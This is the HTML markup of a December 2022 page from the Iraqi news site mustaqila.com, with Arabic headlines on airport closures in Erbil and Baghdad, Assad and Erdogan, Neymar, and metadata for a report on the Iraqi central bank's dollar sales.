		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%b7%d8%a7%d8%b1-%d8%a7%d8%b1%d8%a8%d9%8a%d9%84-%d8%a7%d9%84%d8%af%d9%88%d9%84%d9%8a-%d9%8a%d8%b9%d9%84%d9%86-%d8%a5%d9%8a%d9%82%d8%a7%d9%81-%d8%a7%d9%84%d8%ad%d8%b1%d9%83%d8%a9-%d8%a7%d9%84/" class="post-title post-url">
			مطار اربيل الدولي يعلن إيقاف الحركة الجوية بسبب الظروف الجوية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T09:41:48+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522868 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="مطار بغداد الدولي يعلن إيقاف الحركة الجوية بسبب الظروف الجوية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/317690101_870236144417004_4533814571643375331_n.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;317690101_870236144417004_4533814571643375331_n-210x136.jpg&quot;,&quot;279&quot;:&quot;317690101_870236144417004_4533814571643375331_n-279x220.jpg&quot;,&quot;357&quot;:&quot;317690101_870236144417004_4533814571643375331_n-357x210.jpg&quot;,&quot;620&quot;:&quot;317690101_870236144417004_4533814571643375331_n.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%b7%d8%a7%d8%b1-%d8%a8%d8%ba%d8%af%d8%a7%d8%af-%d8%a7%d9%84%d8%af%d9%88%d9%84%d9%8a-%d9%8a%d8%b9%d9%84%d9%86-%d8%a5%d9%8a%d9%82%d8%a7%d9%81-%d8%a7%d9%84%d8%ad%d8%b1%d9%83%d8%a9-%d8%a7%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%b7%d8%a7%d8%b1-%d8%a8%d8%ba%d8%af%d8%a7%d8%af-%d8%a7%d9%84%d8%af%d9%88%d9%84%d9%8a-%d9%8a%d8%b9%d9%84%d9%86-%d8%a5%d9%8a%d9%82%d8%a7%d9%81-%d8%a7%d9%84%d8%ad%d8%b1%d9%83%d8%a9-%d8%a7%d9%84/" class="post-title post-url">
			مطار بغداد الدولي يعلن إيقاف الحركة الجوية بسبب الظروف الجوية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T09:27:17+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522847 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="رويترز : بشار الأسد رفض اقتراحا لمقابلة نظيره أردوغان" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/-e1670133202775-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;-e1670133202775-210x136.jpg&quot;,&quot;279&quot;:&quot;-e1670133202775-279x220.jpg&quot;,&quot;357&quot;:&quot;-e1670133202775-357x210.jpg&quot;,&quot;750&quot;:&quot;-e1670133202775-750x430.jpg&quot;,&quot;900&quot;:&quot;-e1670133202775.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%b1%d9%88%d9%8a%d8%aa%d8%b1%d8%b2-%d8%a8%d8%b4%d8%a7%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%af-%d8%b1%d9%81%d8%b6-%d8%a7%d9%82%d8%aa%d8%b1%d8%a7%d8%ad%d8%a7-%d9%84%d9%85%d9%82%d8%a7%d8%a8%d9%84%d8%a9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%b1%d9%88%d9%8a%d8%aa%d8%b1%d8%b2-%d8%a8%d8%b4%d8%a7%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%af-%d8%b1%d9%81%d8%b6-%d8%a7%d9%82%d8%aa%d8%b1%d8%a7%d8%ad%d8%a7-%d9%84%d9%85%d9%82%d8%a7%d8%a8%d9%84%d8%a9/" class="post-title post-url">
			رويترز : بشار الأسد رفض اقتراحا لمقابلة نظيره أردوغان		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T08:54:56+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522843 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="نيمار يزف بشرى سارة لـ البرازيل قبل مواجهة كوريا في ثمن نهائي المونديال" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/نيمار-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;\u0646\u064a\u0645\u0627\u0631-210x136.jpg&quot;,&quot;279&quot;:&quot;\u0646\u064a\u0645\u0627\u0631-279x220.jpg&quot;,&quot;357&quot;:&quot;\u0646\u064a\u0645\u0627\u0631-357x210.jpg&quot;,&quot;750&quot;:&quot;\u0646\u064a\u0645\u0627\u0631-750x430.jpg&quot;,&quot;2048&quot;:&quot;\u0646\u064a\u0645\u0627\u0631.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%86%d9%8a%d9%85%d8%a7%d8%b1-%d9%8a%d8%b2%d9%81-%d8%a8%d8%b4%d8%b1%d9%89-%d8%b3%d8%a7%d8%b1%d8%a9-%d9%84%d9%80-%d8%a7%d9%84%d8%a8%d8%b1%d8%a7%d8%b2%d9%8a%d9%84-%d9%82%d8%a8%d9%84-%d9%85%d9%88%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%86%d9%8a%d9%85%d8%a7%d8%b1-%d9%8a%d8%b2%d9%81-%d8%a8%d8%b4%d8%b1%d9%89-%d8%b3%d8%a7%d8%b1%d8%a9-%d9%84%d9%80-%d8%a7%d9%84%d8%a8%d8%b1%d8%a7%d8%b2%d9%8a%d9%84-%d9%82%d8%a8%d9%84-%d9%85%d9%88%d8%a7/" class="post-title post-url">
			نيمار يزف بشرى سارة لـ البرازيل قبل مواجهة كوريا في ثمن نهائي المونديال		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T08:35:22+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	
	</div><div class="bs-pagination bs-ajax-pagination infinity main-term-none clearfix">
							<a  rel="next" class="btn-bs-pagination" data-id="1332035178"
				   title="المزيد من الاخبار">
			<span class="loading" style="display: none;">
				<i class="fa fa-refresh fa-spin fa-fw"></i>
			</span>
					<span class="loading" style="display: none;">
				جار التحميل ...			</span>

					<span class="loaded txt">
				المزيد من الاخبار			</span>

					<span class="loaded icon">
				<i class="fa fa-angle-down" aria-hidden="true"></i>
			</span>

					<span class="no-more" style="display: none;">
				لا مزيد من المشاركات 
			</span>

				</a>

				</div></div></div></div></div></div>
<style type="text/css" data-type="vc_custom-css">.post-summary {
    font-family: Tahoma,Verdana,Segoe,sans-serif;
    font-weight: 400;
    line-height: 22px;
    font-size: 15px;
    text-align: inherit;
    text-transform: initial;
    color: #888888;
    display: none !important;
}</style></div>	<footer id="site-footer" class="site-footer full-width">
		<div class="footer-widgets light-text">
	<div class="content-wrap">
		<div class="container">
			<div class="row">
										<div class="col-sm-3">
							<aside id="sidebar-footer-1" class="sidebar" role="complementary" aria-label="Footer - Column 1 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="bs-about-2" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-1 widget widget_bs-about"><div class="section-heading sh-t2 sh-s3"><span class="h-text">وكالة الصحافة المستقلة</span></div><div  class="bs-shortcode bs-about ">
		<h4 class="about-title">
		<a href="https://www.mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/"></a>	</h4>
	<div class="about-text">
		<p>تنتمي ” المستقلة ” الى العراق شعبا وارضا وتاريخا وحضارة .. ترمي لمدً انشطتها الى  كل ميادين الحياة ، وتسعى الى ملاحقة الاحداث اليومية بصفاء وصدق ، كيما تجسد الحقيقة وتضعها في المكانة اللائقة ، وتبدد العتمة حتى تمتلأ القلوب والعقول بوهج الحياة المفعمة بالخير والنماء.</p>
	</div>
			<div class="about-link heading-typo">
			<a href="https://www.mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/">اقرأ أكثر...</a>
		</div>
	</div>
</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-2" class="sidebar" role="complementary" aria-label="Footer - Column 2 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="bs-popular-categories-2" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-2 widget widget_bs-popular-categories"><div class="section-heading sh-t2 sh-s3"><span class="h-text">أشهر الاقسام</span></div>	<div  class="bs-shortcode bs-popular-categories ">
					<ul class="bs-popular-terms-list">
				<li class="bs-popular-term-item term-item-83">
					<a href="https://mustaqila.com/last/">اخر الاخبار<span class="term-count">71718</span></a>
				  </li><li class="bs-popular-term-item term-item-34">
					<a href="https://mustaqila.com/political/">سياسية<span class="term-count">21957</span></a>
				  </li><li class="bs-popular-term-item term-item-7">
					<a href="https://mustaqila.com/general/">عامة ومنوعات<span class="term-count">19456</span></a>
				  </li><li class="bs-popular-term-item term-item-907">
					<a href="https://mustaqila.com/arts/">ثقافة وفنون<span class="term-count">14851</span></a>
				  </li><li class="bs-popular-term-item term-item-46">
					<a href="https://mustaqila.com/economy/">اقتصادية<span class="term-count">12859</span></a>
				  </li><li class="bs-popular-term-item term-item-1055">
					<a href="https://mustaqila.com/sport/">رياضية<span class="term-count">11011</span></a>
				  </li>			</ul>
				</div>
</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-3" class="sidebar" role="complementary" aria-label="Footer - Column 3 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="text-15" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-3 widget widget_text"><div class="section-heading sh-t2 sh-s3"><span class="h-text">موسوعة الاخبار</span></div>			<div class="textwidget"><p>تابع اخر الاخبار في مكان واحد من موسوعة الاخبار</p>
<p><a href="http://wiki-news.net/">موسوعة الاخبار &#8211; Wiki news</a></p>
</div>
		</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-4" class="sidebar" role="complementary" aria-label="Footer - Column 4 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="text-14" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-4 widget widget_text"><div class="section-heading sh-t2 sh-s3"><span class="h-text">المستقلة موبايل</span></div>			<div class="textwidget"><p>تابع اخر الاخبار والاحداث على هاتفك الذكي من خلال المستقلة موبايل</p>
<p><a href="https://apps.apple.com/jo/app/%D9%88%D9%83%D8%A7%D9%84%D8%A9-%D8%A7%D9%84%D8%B5%D8%AD%D8%A7%D9%81%D8%A9-%D8%A7%D9%84%D9%85%D8%B3%D8%AA%D9%82%D9%84%D8%A9/id1038258912"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-324562" src="https://i0.wp.com/i68.servimg.com/u/f68/11/87/36/37/appsto10.png?resize=225%2C66&#038;ssl=1" alt="" width="225" height="66" data-recalc-dims="1" /></a> <a href="https://play.google.com/store/apps/details?id=com.mustaqila"><img decoding="async" loading="lazy" class="alignnone size-medium wp-image-324563" src="https://i0.wp.com/i68.servimg.com/u/f68/11/87/36/37/mus_gp10.png?resize=225%2C66&#038;ssl=1" alt="" width="225" height="66" data-recalc-dims="1" /></a></p>
</div>
		</div>							</aside>
						</div>
									</div>
		</div>
	</div>
</div>
		<div class="copy-footer">
			<div class="content-wrap">
				<div class="container">
						<div class="row">
		<div class="col-lg-12">
			<div id="menu-footer" class="menu footer-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
				<nav class="footer-menu-container">
					<ul id="footer-navigation" class="footer-menu menu clearfix">
						<li id="menu-item-329769" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-329769"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li id="menu-item-329763" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-329763"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li id="menu-item-329764" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-329764"><a href="https://mustaqila.com/security/">امنية</a></li>
<li id="menu-item-329768" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-329768"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li id="menu-item-329770" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-329770"><a href="https://mustaqila.com/health/">طب و صحة</a></li>
<li id="menu-item-329767" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-329767"><a href="https://mustaqila.com/arts/">ثقافة وفنون</a></li>
<li id="menu-item-329771" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-329771"><a href="https://mustaqila.com/general/">عامة ومنوعات</a></li>
<li id="menu-item-329775" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-329775"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li id="menu-item-329772" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-329772"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li id="menu-item-329773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-329773"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li id="menu-item-329774" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-329774"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li id="menu-item-329776" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-329776"><a href="https://mustaqila.com/articles/">مقالات مختارة</a></li>
<li id="menu-item-329765" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9606 better-anim-fade menu-item-329765"><a href="https://mustaqila.com/infographic/">انفوجرافيك</a></li>
<li id="menu-item-329777" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-10 better-anim-fade menu-item-329777"><a href="https://mustaqila.com/video/">مكتبة الفيديو</a></li>
					</ul>
				</nav>
			</div>
		</div>
	</div>
					<div class="row footer-copy-row">
						<div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12">
							وكالة الصحافة المستقلة - 2022.						</div>
						<div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12">
													</div>
					</div>
				</div>
			</div>
		</div>
	</footer><!-- .footer -->
		</div><!-- .main-wrap -->
			<span class="back-top"><i class="fa fa-arrow-up"></i></span>

<!-- Global site tag (gtag.js) - Google Analytics -->

		<div id="amp-mobile-version-switcher" hidden>
			<a rel="" href="https://mustaqila.com/%D8%A7%D9%84%D9%85%D8%B1%D9%83%D8%B2%D9%8A-%D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%D9%8A-%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D9%85%D8%A8%D9%8A%D8%B9%D8%A7%D8%AA-%D8%A7%D9%84%D8%AD%D9%88%D8%A7%D9%84/amp/">
				Go to mobile version			</a>
		</div>

				

		<div class="rh-cover noscroll  no-login-icon" style="background-color: #131939">
			<span class="rh-close"></span>
			<div class="rh-panel rh-pm">
				<div class="rh-p-h">
									</div>

				<div class="rh-p-b">
										<div class="rh-c-m clearfix"><ul id="resp-navigation" class="resp-menu menu clearfix"><li class="menu-item menu-item-type-custom menu-item-object-custom better-anim-fade menu-item-326611"><a href="https://www.mustaqila.com/latest">كل الاخبار</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-210152"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-210148"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-210149"><a href="https://mustaqila.com/security/">امنية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-210151"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-210153"><a href="https://mustaqila.com/health/">صحة</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-210150"><a href="https://mustaqila.com/arts/">فن</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-210154"><a href="https://mustaqila.com/general/">منوعات</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-210156"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-210157"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-210158"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-210159"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-210160"><a href="https://mustaqila.com/articles/">مقالات</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children better-anim-fade menu-item-405729"><a href="#">حسب الدول</a>
<ul class="sub-menu">
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-16487 better-anim-fade menu-item-407192"><a href="https://mustaqila.com/iq/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/iraq-1.png"></i>اخبار العراق</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-23821 better-anim-fade menu-item-467764"><a href="https://mustaqila.com/palestine/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/05/palestine.png"></i>اخبار فلسطين</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-17579 better-anim-fade menu-item-440480"><a href="https://mustaqila.com/egy/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/11/egypt.png"></i>اخبار مصر</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-20280 better-anim-fade menu-item-444502"><a href="https://mustaqila.com/ksa/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/02/saudi-arabia.png"></i>اخبار السعودية</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-21593 better-anim-fade menu-item-453695"><a href="https://mustaqila.com/jordan/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/jordan.png"></i>اخبار الاردن</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-26210 better-anim-fade menu-item-497367"><a href="https://mustaqila.com/%d8%a7%d8%ae%d8%a8%d8%a7%d8%b1-%d9%82%d8%b7%d8%b1/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/01/qater.png"></i>اخبار قطر</a></li>
</ul>
</li>
</ul></div>

											<form role="search" method="get" class="search-form" action="https://mustaqila.com">
							<input type="search" class="search-field"
							       placeholder="بحث..."
							       value="" name="s"
							       title="البحث عن:"
							       autocomplete="off">
							<input type="submit" class="search-submit" value="">
						</form>
										</div>
			</div>
					</div>
		<link rel='stylesheet' id='js_composer_front-css' href='https://mustaqila.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.7.0' type='text/css' media='all' />






	
	
<script type="text/javascript">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</script><script type="application/ld+json" class="yoast-schema-graph">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</script><script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/mustaqila.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script><script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script><script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script><script data-ad-client="ca-pub-1920816103235815" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "Organization",
    "@id": "#organization",
    "logo": {
        "@type": "ImageObject",
        "url": "https://www.mustaqila.com/wp-content/uploads/2021/02/mustaqila_logo.png"
    },
    "url": "https://mustaqila.com/",
    "name": "\u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0635\u062d\u0627\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629",
    "description": "\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0631\u0627\u0642 - \u0633\u064a\u0627\u0633\u0629 - \u0645\u0627\u0644 \u0648\u0627\u0639\u0645\u0627\u0644 - \u0627\u062e\u0628\u0627\u0631 \u0641\u0646\u064a\u0629"
}</script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "WebSite",
    "name": "\u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0635\u062d\u0627\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629",
    "alternateName": "\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0631\u0627\u0642 - \u0633\u064a\u0627\u0633\u0629 - \u0645\u0627\u0644 \u0648\u0627\u0639\u0645\u0627\u0644 - \u0627\u062e\u0628\u0627\u0631 \u0641\u0646\u064a\u0629",
    "url": "https://mustaqila.com/"
}</script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "NewsArticle",
    "headline": "\u0627\u0644\u0645\u0631\u0643\u0632\u064a \u0627\u0644\u0639\u0631\u0627\u0642\u064a :\u0627\u0631\u062a\u0641\u0627\u0639 \u0645\u0628\u064a\u0639\u0627\u062a \u0627\u0644\u062d\u0648\u0627\u0644\u0627\u062a \u0627\u0644\u062e\u0627\u0631\u062c\u064a\u0629 \u0645\u0646 \u0627\u0644\u062f\u0648\u0644\u0627\u0631 \u0646\u062d\u0648  130 \u0645\u0644\u064a\u0648\u0646",
    "description": "\u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629 /- \u0627\u0631\u062a\u0641\u0639\u062a \u0645\u0628\u064a\u0639\u0627\u062a \u0627\u0644\u0628\u0646\u0643 \u0627\u0644\u0645\u0631\u0643\u0632\u064a \u0627\u0644\u0639\u0631\u0627\u0642\u064a \u0645\u0646 \u0627\u0644\u062f\u0648\u0644\u0627\u0631 \u0644\u0644\u062d\u0648\u0627\u0644\u0627\u062a \u0627\u0644\u062e\u0627\u0631\u062c\u064a\u0629\u060c \u064a\u0648\u0645 \u0627\u0644\u0623\u062d\u062f\u060c \u0646\u062d\u0648 130 \u0645\u0644\u064a\u0648\u0646 \u062f\u0648\u0644\u0627\u0631 \u0641\u064a \u0645\u0632\u0627\u062f \u0627\u0644\u064a\u0648\u0645 \u0628\u0645\u0634\u0627\u0631\u0643\u0629 31 \u0645\u0635\u0631\u0641\u0627.\u0627\u0654\u0646 \"\u0627\u0644\u0628\u0646\u0643 \u0627\u0644\u0645\u0631\u0643\u0632\u064a \u0628\u0627\u0639 \u0627\u0644\u064a\u0648\u0645 \u062e\u0644\u0627\u0644 \u0645\u0632\u0627\u062f\u0647 \u0644\u0628\u064a\u0639 \u0648\u0634\u0631\u0627\u0621 \u0627\u0644\u062f\u0648\u0644\u0627\u0631 \u0627\u0644\u0627\u0645\u0631\u064a\u0643\u064a\u060c 129 \u0645\u0644\u064a\u0648\u0646\u0627 \u0648 301 \u0627\u0644\u0641\u0627 \u0648 909 \u062f\u0648\u0644\u0627\u0631\u0627\u060c \u063a\u0637\u0627\u0647\u0627",
    "datePublished": "2022-12-04",
    "dateModified": "2022-12-04",
    "author": {
        "@type": "Person",
        "@id": "#person-Abdulmalk",
        "name": "Abdulmalk"
    },
    "image": "https://www.mustaqila.com/wp-content/uploads/?i=/2022/08/\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a.jpeg",
    "interactionStatistic": [
        {
            "@type": "InteractionCounter",
            "interactionType": "http://schema.org/CommentAction",
            "userInteractionCount": "0"
        }
    ],
    "publisher": {
        "@id": "#organization"
    },
    "mainEntityOfPage": "https://mustaqila.com/%d8%a7%d9%84%d9%85%d8%b1%d9%83%d8%b2%d9%8a-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82%d9%8a-%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d9%85%d8%a8%d9%8a%d8%b9%d8%a7%d8%aa-%d8%a7%d9%84%d8%ad%d9%88%d8%a7%d9%84/"
